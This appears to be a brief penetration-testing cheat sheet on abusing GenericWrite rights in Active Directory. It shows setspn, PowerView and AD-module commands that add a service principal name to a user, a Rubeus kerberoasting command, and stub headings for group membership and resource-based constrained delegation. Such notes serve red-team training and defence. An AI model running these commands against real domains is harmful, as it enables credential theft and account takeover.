GenericWrite

GenericWrite

User

# Setspn
C:\Tools>setspn -S 'http/dc01' vulnableone.local\testservice3
Checking domain DC=vulnableone,DC=local

Registering ServicePrincipalNames for CN=TestService3,OU=prodUsers,DC=vulnableone, DC=local
        'http/dc01'
Updated object

# PowerView
Set-DomainObject -Identity khan.chanthou -Set @{serviceprincipalname='vulnableone/myspn1433'} -verbose

# AD-Module
Set-ADUser -Identity khan.chanthou -ServicePrincipalNames @{Add='vulnableone/myspn1433'} 

Request for ticket

Rubeus.exe kerberoast /user:testservice3 /nowrap

Crack hash

Group

Add Member

We can verify that the command worked by using the Get-ADGroupMember cmdlet:

Computer

We can enumerate and attempted for Resourced Based Constrained Delegation.

Last updated